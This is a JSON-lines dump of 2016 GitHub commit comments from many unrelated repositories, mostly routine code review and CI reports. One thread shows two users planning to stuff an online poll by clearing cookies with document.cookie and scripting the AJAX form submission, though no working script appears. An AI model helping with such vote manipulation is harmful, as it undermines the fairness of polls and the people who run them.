{"id":"4530042711","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935050,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:25:18Z","updated_at":"2016-09-07T20:25:18Z","body":"Couldn't we get IN TROUBLE for that?"}},"created_at":"2016-09-07T20:25:18Z"}
{"id":"4530044006","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935054,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:25:33Z","updated_at":"2016-09-07T20:25:33Z","body":"document.cookie = \"\"?\r\nMaybe?\r\nOr not?"}},"created_at":"2016-09-07T20:25:33Z"}
{"id":"4530044813","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935056,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:25:42Z","updated_at":"2016-09-07T20:25:42Z","body":"(My email is being spammed)"}},"created_at":"2016-09-07T20:25:42Z"}
{"id":"4530045055","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935059,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:25:45Z","updated_at":"2016-09-07T20:25:45Z","body":"Maybe, I'll try it."}},"created_at":"2016-09-07T20:25:45Z"}
{"id":"4530047998","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935064,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:26:18Z","updated_at":"2016-09-07T20:26:18Z","body":"How did I not hear about this program?"}},"created_at":"2016-09-07T20:26:18Z"}
{"id":"4530048418","type":"CommitCommentEvent","actor":{"login":"trevorackerman"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18935065,"position":108,"line":108,"path":"traffic_router/core/src/main/java/com/comcast/cdn/traffic_control/traffic_router/core/loc/NetAcuityGeolocationService.java","commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-07T20:26:23Z","updated_at":"2016-09-07T20:26:23Z","body":"It's highly unusual to try and force garbage collection and it's outcomes can't be guaranteed.\r\nAgain I'm not sure if memory mapping the file solves a significant problem."}},"created_at":"2016-09-07T20:26:23Z"}
{"id":"4530050444","type":"CommitCommentEvent","actor":{"login":"mikeobrien"},"repo":{"name":"mikeobrien/Bender"},"payload":{"comment":{"id":18935069,"position":null,"line":null,"path":null,"commit_id":"7ca4e03fe26083768e7eb91c605db4e9a359d8fd","created_at":"2016-09-07T20:26:44Z","updated_at":"2016-09-07T20:26:44Z","body":"TeamCity Bender :: Deploy [Build 3.0.55.0](http://build.mikeobrien.net/viewLog.html?buildId=2713&buildTypeId=bender&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 5093, ignored: 5 Build time: 00:00:37"}},"created_at":"2016-09-07T20:26:44Z"}
{"id":"4530051735","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935076,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:26:58Z","updated_at":"2016-09-07T20:26:58Z","body":"Because it hasn't been made yet.  And document.cookie = \"\" only works client side I think, so it wouldn't work."}},"created_at":"2016-09-07T20:26:58Z"}
{"id":"4530051844","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18935077,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T20:26:59Z","updated_at":"2016-09-07T20:26:59Z","body":"Congrats to you for passing this nice idea!"}},"created_at":"2016-09-07T20:26:59Z"}
{"id":"4530056597","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935085,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:27:50Z","updated_at":"2016-09-07T20:27:50Z","body":"What?\r\n"}},"created_at":"2016-09-07T20:27:50Z"}
{"id":"4530057761","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935087,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:28:02Z","updated_at":"2016-09-07T20:28:02Z","body":"Aren't you doing it client side?"}},"created_at":"2016-09-07T20:28:02Z"}
{"id":"4530058038","type":"CommitCommentEvent","actor":{"login":"MaximeGILLET"},"repo":{"name":"MaximeGILLET/Quotes"},"payload":{"comment":{"id":18935088,"position":null,"line":null,"path":null,"commit_id":"b9a4ddfca637c8d72ecea2131785d7080cdf4447","created_at":"2016-09-07T20:28:07Z","updated_at":"2016-09-07T20:28:07Z","body":"troll?\r\n"}},"created_at":"2016-09-07T20:28:07Z"}
{"id":"4530060875","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18935094,"position":null,"line":null,"path":null,"commit_id":"b92ca63a6ec0260f0dc11f43ddba6f22bc458bcb","created_at":"2016-09-07T20:28:36Z","updated_at":"2016-09-07T20:28:36Z","body":"The following doc(s) have been deployed to the [1823planc](https://1823planc-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/platform-resources](https://1823planc-static-docs.pantheonsite.io/docs/platform-resources)\n- [source/_views/doc.html](https://github.com/pantheon-systems/documentation/commit/4601ec62dd88ff6fdfb3d7997604d9f4858b9e27/source/_views/doc.html)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/4601ec62dd88ff6fdfb3d7997604d9f4858b9e27/source/docs/assets/css/main.css)\n"}},"created_at":"2016-09-07T20:28:36Z"}
{"id":"4530062276","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18935097,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T20:28:50Z","updated_at":"2016-09-07T20:28:50Z","body":"Killer patch, congrats!"}},"created_at":"2016-09-07T20:28:50Z"}
{"id":"4530062907","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935098,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:28:57Z","updated_at":"2016-09-07T20:28:57Z","body":"I don't know.  You have to submit a form, so I'm not sure if you could do that."}},"created_at":"2016-09-07T20:28:57Z"}
{"id":"4530066981","type":"CommitCommentEvent","actor":{"login":"Tympanix"},"repo":{"name":"Tympanix/angular-xmlrpc"},"payload":{"comment":{"id":18935107,"position":null,"line":null,"path":null,"commit_id":"71cc7e9b11d643841a22eea222978a45a2d72c8b","created_at":"2016-09-07T20:29:41Z","updated_at":"2016-09-07T20:29:41Z","body":"It is important to use $q.reject and $q.resolve as the promise chain may continue on after returning the $http.post promise. This way, further .then() and .catch() chains will be called and handled correctly."}},"created_at":"2016-09-07T20:29:41Z"}
{"id":"4530067635","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935110,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:29:48Z","updated_at":"2016-09-07T20:29:48Z","body":"(click on the submit button, LOL, Penetration/Security Testing for the WIN [The small amount I've done]"}},"created_at":"2016-09-07T20:29:48Z"}
{"id":"4530068093","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935112,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:29:52Z","updated_at":"2016-09-07T20:29:52Z","body":")"}},"created_at":"2016-09-07T20:29:52Z"}
{"id":"4530069502","type":"CommitCommentEvent","actor":{"login":"MichaelChirico"},"repo":{"name":"MichaelChirico/data.table"},"payload":{"comment":{"id":18935116,"position":4,"line":2482,"path":"R/data.table.R","commit_id":"f4922c095aab5778faf24ed2d0a5e6c34cbee7d3","created_at":"2016-09-07T20:30:09Z","updated_at":"2016-09-07T20:30:09Z","body":"@jangorecki argh, was foolishly hoping that wouldn't happen.\r\n\r\nKeeping `neworder` makes the new code a lot harder to read, IMO; how about a deprecation message?\r\n\r\nOpen to robust arg name suggestions"}},"created_at":"2016-09-07T20:30:09Z"}
{"id":"4530076603","type":"CommitCommentEvent","actor":{"login":"vegeta897"},"repo":{"name":"vegeta897/d-bot"},"payload":{"comment":{"id":18935133,"position":null,"line":null,"path":null,"commit_id":"0068b0f294bd6ed304a16b8915b4d99314edade2","created_at":"2016-09-07T20:31:21Z","updated_at":"2016-09-07T20:31:21Z","body":"Thanks for helping me test, @voiperr !"}},"created_at":"2016-09-07T20:31:21Z"}
{"id":"4530077056","type":"CommitCommentEvent","actor":{"login":"burak13"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18935134,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T20:31:25Z","updated_at":"2016-09-07T20:31:25Z","body":"Quite a ruckus we have made here, but it was worth it! Congrats to @ajithcj !"}},"created_at":"2016-09-07T20:31:25Z"}
{"id":"4530078028","type":"CommitCommentEvent","actor":{"login":"trevorackerman"},"repo":{"name":"bengunter/traffic_control"},"payload":{"comment":{"id":18935135,"position":null,"line":null,"path":null,"commit_id":"48412b475fe0b0092e747ddc9631b359d5a74342","created_at":"2016-09-07T20:31:35Z","updated_at":"2016-09-07T20:31:35Z","body":"For this service to work, another entry must be made to the application context file that will cause a thread to periodically download your data. Similar to https://github.com/bengunter/traffic_control/blob/master/traffic_router/core/src/main/resources/applicationContext.xml#L106\r\n\r\nIf you would like to have this code added to the official traffic control source code please take the above comments into consideration and make a pull request to the official traffic control repository.\r\n\r\nhttps://help.github.com/articles/creating-a-pull-request/"}},"created_at":"2016-09-07T20:31:35Z"}
{"id":"4530083461","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935145,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:32:33Z","updated_at":"2016-09-07T20:32:33Z","body":"The submit button disappears after clicking \"Submit,\" but there's probably a way around that.  I can't do it right now though, so I'll leave it to you or Alex."}},"created_at":"2016-09-07T20:32:33Z"}
{"id":"4530084994","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":18935149,"position":null,"line":null,"path":null,"commit_id":"7c8e9c1c6dfe11d89ea5cfaa445333aab68d4cac","created_at":"2016-09-07T20:32:49Z","updated_at":"2016-09-07T20:32:49Z","body":"oh 866... yep, should be definitely changed in code"}},"created_at":"2016-09-07T20:32:49Z"}
{"id":"4530086556","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18935153,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T20:33:07Z","updated_at":"2016-09-07T20:33:07Z","body":"I would refactor  this patch because of the duplicated conditions:\r\n\r\nif (   !rootNode\r\n           && !inCheck\r\n           &&  bestValue > VALUE_MATED_IN_MAX_PLY)\r\n{\r\n       if(!captureOrPromotion\r\n           && !givesCheck\r\n           && !pos.advanced_pawn_push(move))\r\n       {\r\n          .....\r\n      }\r\n     else if(depth < 3 * ONE_PLY\r\n              && pos.see_sign(move) < VALUE_ZERO)\r\n\t    continue;\r\n}\r\n\r\n"}},"created_at":"2016-09-07T20:33:07Z"}
{"id":"4530087620","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18935155,"position":28,"line":28,"path":"app/styles/client/client.scss","commit_id":"fe15c442403cc3f78a130864fc047c3c6305607c","created_at":"2016-09-07T20:33:17Z","updated_at":"2016-09-07T20:33:17Z","body":"Esto sobreescribe todos los estilos "}},"created_at":"2016-09-07T20:33:17Z"}
{"id":"4530087704","type":"CommitCommentEvent","actor":{"login":"Shine-neko"},"repo":{"name":"Sylius/Sylius"},"payload":{"comment":{"id":18935156,"position":null,"line":null,"path":null,"commit_id":"d5e983c3f94f1893b21c6b8d4a74ccdd47f4b01a","created_at":"2016-09-07T20:33:17Z","updated_at":"2016-09-07T20:33:17Z","body":"@pamil Why remove this ? "}},"created_at":"2016-09-07T20:33:17Z"}
{"id":"4530089102","type":"CommitCommentEvent","actor":{"login":"presidentbeef"},"repo":{"name":"presidentbeef/brakeman"},"payload":{"comment":{"id":18935162,"position":null,"line":null,"path":null,"commit_id":"8fa2fd13745097e0a4c4a6035d68a808b52e37ee","created_at":"2016-09-07T20:33:32Z","updated_at":"2016-09-07T20:33:32Z","body":"Yeah...I meant 3.4.0"}},"created_at":"2016-09-07T20:33:32Z"}
{"id":"4530089183","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935163,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:33:33Z","updated_at":"2016-09-07T20:33:33Z","body":"What do you mean? If it dissapears when you click Submit, shouldn't it SUBMIT?"}},"created_at":"2016-09-07T20:33:33Z"}
{"id":"4530089782","type":"CommitCommentEvent","actor":{"login":"brauliodiez"},"repo":{"name":"Sirikon/geopic-app"},"payload":{"comment":{"id":18935165,"position":null,"line":null,"path":null,"commit_id":"2f1886b680d7b7dccf8b6ea43a57795c96384492","created_at":"2016-09-07T20:33:38Z","updated_at":"2016-09-07T20:33:38Z","body":"Cool stuff ;)"}},"created_at":"2016-09-07T20:33:38Z"}
{"id":"4530090171","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18935166,"position":28,"line":28,"path":"app/styles/client/client.scss","commit_id":"fe15c442403cc3f78a130864fc047c3c6305607c","created_at":"2016-09-07T20:33:43Z","updated_at":"2016-09-07T20:33:43Z","body":"Ah... no vi la indentation... está bien, perdón "}},"created_at":"2016-09-07T20:33:43Z"}
{"id":"4530091677","type":"CommitCommentEvent","actor":{"login":"rost314"},"repo":{"name":"chrisz/pyhusmow"},"payload":{"comment":{"id":18935168,"position":null,"line":null,"path":null,"commit_id":"553b67950a226d922323217437fc7d63ade95986","created_at":"2016-09-07T20:34:00Z","updated_at":"2016-09-07T20:34:00Z","body":":+1: "}},"created_at":"2016-09-07T20:34:00Z"}
{"id":"4530091838","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935170,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:34:02Z","updated_at":"2016-09-07T20:34:02Z","body":"*Alex, upload a blank repo to github, give me access, and let's do this*"}},"created_at":"2016-09-07T20:34:02Z"}
{"id":"4530092164","type":"CommitCommentEvent","actor":{"login":"grahamplace"},"repo":{"name":"maggie-lou/maggie-lou.github.io"},"payload":{"comment":{"id":18935172,"position":null,"line":null,"path":null,"commit_id":"de613717f28e772b531a577b1d0c0a84effd76a5","created_at":"2016-09-07T20:34:06Z","updated_at":"2016-09-07T20:34:06Z","body":"I like the new images 10/10"}},"created_at":"2016-09-07T20:34:06Z"}
{"id":"4530092404","type":"CommitCommentEvent","actor":{"login":"dallaswinger"},"repo":{"name":"aopp/android_packages_apps_SetupWizard"},"payload":{"comment":{"id":18935175,"position":null,"line":null,"path":null,"commit_id":"79953b499f8ad2a86cff6712d3930f697a923c3a","created_at":"2016-09-07T20:34:09Z","updated_at":"2016-09-07T20:34:09Z","body":"This commit also pages the user back to the wifi page automatically when they encounter a connection error after they dismiss the alert dialog. "}},"created_at":"2016-09-07T20:34:09Z"}
{"id":"4530095467","type":"CommitCommentEvent","actor":{"login":"lefticus"},"repo":{"name":"lefticus/decent_ci_runner"},"payload":{"comment":{"id":18935180,"position":null,"line":null,"path":null,"commit_id":"6bc896fb353a764db32237bf5f7cae1a93b993c9","created_at":"2016-09-07T20:34:43Z","updated_at":"2016-09-07T20:34:43Z","body":"@Myoldmopar documentation updates and sample config files to clarify the differences between vm manager mode and regular CI mode."}},"created_at":"2016-09-07T20:34:43Z"}
{"id":"4530096045","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18935182,"position":19,"line":19,"path":"app/templates/client/clients.jade","commit_id":"fe15c442403cc3f78a130864fc047c3c6305607c","created_at":"2016-09-07T20:34:50Z","updated_at":"2016-09-07T20:34:50Z","body":"creo que la indentación no es correcta"}},"created_at":"2016-09-07T20:34:50Z"}
{"id":"4530097249","type":"CommitCommentEvent","actor":{"login":"tsheaff"},"repo":{"name":"Alamofire/Alamofire"},"payload":{"comment":{"id":18935184,"position":null,"line":null,"path":null,"commit_id":"6775cb13f7329f1184e5737ca226958eaabce271","created_at":"2016-09-07T20:35:03Z","updated_at":"2016-09-07T20:35:03Z","body":"@jshier why? What iOS 9 features are needed?"}},"created_at":"2016-09-07T20:35:03Z"}
{"id":"4530098155","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18935188,"position":null,"line":null,"path":null,"commit_id":"aaeb6a1593327a2b1968b149ed7758fc61fe3d55","created_at":"2016-09-07T20:35:14Z","updated_at":"2016-09-07T20:35:14Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-MacOS-10.9-clang: OK (2325 of 2328 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T20:35:14Z"}
{"id":"4530099592","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935191,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:35:28Z","updated_at":"2016-09-07T20:35:28Z","body":"I believe it submits through AJAX because there is no page refresh."}},"created_at":"2016-09-07T20:35:28Z"}
{"id":"4530099990","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18935192,"position":19,"line":19,"path":"app/templates/client/clients.jade","commit_id":"fe15c442403cc3f78a130864fc047c3c6305607c","created_at":"2016-09-07T20:35:33Z","updated_at":"2016-09-07T20:35:33Z","body":"y creo que debemos evitar etiquetas `<script />` dentro de templates. mejor mover a un propio template esto cc @fabricioflores "}},"created_at":"2016-09-07T20:35:33Z"}
{"id":"4530104232","type":"CommitCommentEvent","actor":{"login":"smithfarm"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":18935199,"position":34,"line":398,"path":"xml/admin_ceph_upgrade.xml","commit_id":"63d80430bd0e3fe3918e358a540761c6c5119ce4","created_at":"2016-09-07T20:36:19Z","updated_at":"2016-09-07T20:36:19Z","body":"@tbazant Please add \"before you upgrade your cluster\" at the end of the sentence. Thanks."}},"created_at":"2016-09-07T20:36:19Z"}
{"id":"4530104643","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935201,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:36:24Z","updated_at":"2016-09-07T20:36:24Z","body":"Uggh, AJAX.\r\nThus, POWERSHELL!"}},"created_at":"2016-09-07T20:36:24Z"}
{"id":"4530105574","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935203,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:36:34Z","updated_at":"2016-09-07T20:36:34Z","body":"(How long will this be up there for?)"}},"created_at":"2016-09-07T20:36:34Z"}
{"id":"4530107107","type":"CommitCommentEvent","actor":{"login":"martinallison"},"repo":{"name":"potatolondon/search"},"payload":{"comment":{"id":18935209,"position":null,"line":null,"path":null,"commit_id":"551c31868ee9e6d56117aa99609c62c2eb8e9761","created_at":"2016-09-07T20:36:51Z","updated_at":"2016-09-07T20:36:51Z","body":"How come `build` is calling `save` on anything anyways? And if that's the case, can the calling code wrap the relevant part with `non_atomic`?\r\n\r\nOr is this because `build` is happening on an atomic save of something somewhere, and looking up related objects in `build` is causing errors?"}},"created_at":"2016-09-07T20:36:51Z"}
{"id":"4530107172","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935210,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:36:51Z","updated_at":"2016-09-07T20:36:51Z","body":"(The voting for Maryville v. Alcoa?)"}},"created_at":"2016-09-07T20:36:51Z"}
{"id":"4530109490","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935217,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:37:17Z","updated_at":"2016-09-07T20:37:17Z","body":"The form is named \"whatever\" if you look in the console.  And yes, vote for Maryville v. Alcoa."}},"created_at":"2016-09-07T20:37:17Z"}
{"id":"4530112568","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935229,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:37:49Z","updated_at":"2016-09-07T20:37:49Z","body":"I KNOW TO VOTE FOR MARYVILLE V. ALCOA! I'm asking when does it go down?"}},"created_at":"2016-09-07T20:37:49Z"}
{"id":"4530116250","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935240,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:38:29Z","updated_at":"2016-09-07T20:38:29Z","body":"Probably after tomorrow."}},"created_at":"2016-09-07T20:38:29Z"}
{"id":"4530116809","type":"CommitCommentEvent","actor":{"login":"237444405"},"repo":{"name":"237444405/xiedong"},"payload":{"comment":{"id":18935242,"position":1,"line":1,"path":"service","commit_id":"37e856fb58bb2204435c60dd2d5ae32bb97f3e26","created_at":"2016-09-07T20:38:36Z","updated_at":"2016-09-07T20:38:36Z","body":"111"}},"created_at":"2016-09-07T20:38:36Z"}
{"id":"4530119152","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935249,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:39:00Z","updated_at":"2016-09-07T20:39:00Z","body":"*sighs*, Oh, great."}},"created_at":"2016-09-07T20:39:00Z"}
{"id":"4530121471","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935254,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:39:26Z","updated_at":"2016-09-07T20:39:26Z","body":"Knowing Alex, we'll get it done as it gets taken down!"}},"created_at":"2016-09-07T20:39:26Z"}
{"id":"4530121798","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935257,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:39:29Z","updated_at":"2016-09-07T20:39:29Z","body":"Good luck."}},"created_at":"2016-09-07T20:39:29Z"}
{"id":"4530123887","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"SebWouters/CheMPS2"},"payload":{"comment":{"id":18935266,"position":null,"line":null,"path":null,"commit_id":"72a9286ef997f92e218f38d223252f262f9d66e7","created_at":"2016-09-07T20:39:51Z","updated_at":"2016-09-07T20:39:51Z","body":"Yes. I was worried about install location, but after testing, it looks just fine."}},"created_at":"2016-09-07T20:39:51Z"}
{"id":"4530125884","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935273,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:40:14Z","updated_at":"2016-09-07T20:40:14Z","body":"(I won't be testing this thing)"}},"created_at":"2016-09-07T20:40:14Z"}
{"id":"4530126542","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935277,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:40:20Z","updated_at":"2016-09-07T20:40:20Z","body":"Just, no!"}},"created_at":"2016-09-07T20:40:20Z"}
{"id":"4530133155","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18935300,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T20:41:31Z","updated_at":"2016-09-07T20:41:31Z","body":"@locutus2 Thanks for pointing out.  I have removed the redundant conditions and raised a pull request:\r\nhttps://github.com/official-stockfish/Stockfish/pull/788\r\n"}},"created_at":"2016-09-07T20:41:31Z"}
{"id":"4530133624","type":"CommitCommentEvent","actor":{"login":"tolson17"},"repo":{"name":"atippett/jokes"},"payload":{"comment":{"id":18935304,"position":4,"line":4,"path":"watchingyou.sh","commit_id":"341db19ca4395fa96c9e19c010ad969d5fc59bee","created_at":"2016-09-07T20:41:37Z","updated_at":"2016-09-07T20:41:37Z","body":"👍 "}},"created_at":"2016-09-07T20:41:37Z"}
{"id":"4530135329","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935307,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:41:55Z","updated_at":"2016-09-07T20:41:55Z","body":"I'll test it for you once you make it, but I have to go for now."}},"created_at":"2016-09-07T20:41:55Z"}
{"id":"4530135353","type":"CommitCommentEvent","actor":{"login":"qr7hur"},"repo":{"name":"MaximeGILLET/Quotes"},"payload":{"comment":{"id":18935308,"position":null,"line":null,"path":null,"commit_id":"b9a4ddfca637c8d72ecea2131785d7080cdf4447","created_at":"2016-09-07T20:41:55Z","updated_at":"2016-09-07T20:41:55Z","body":"FIGHT"}},"created_at":"2016-09-07T20:41:55Z"}
{"id":"4530139550","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935317,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:42:40Z","updated_at":"2016-09-07T20:42:40Z","body":"CRAP, IT'S BEING TAKEN DOWN TODAY\r\n@JoinRajunCraftNow"}},"created_at":"2016-09-07T20:42:40Z"}
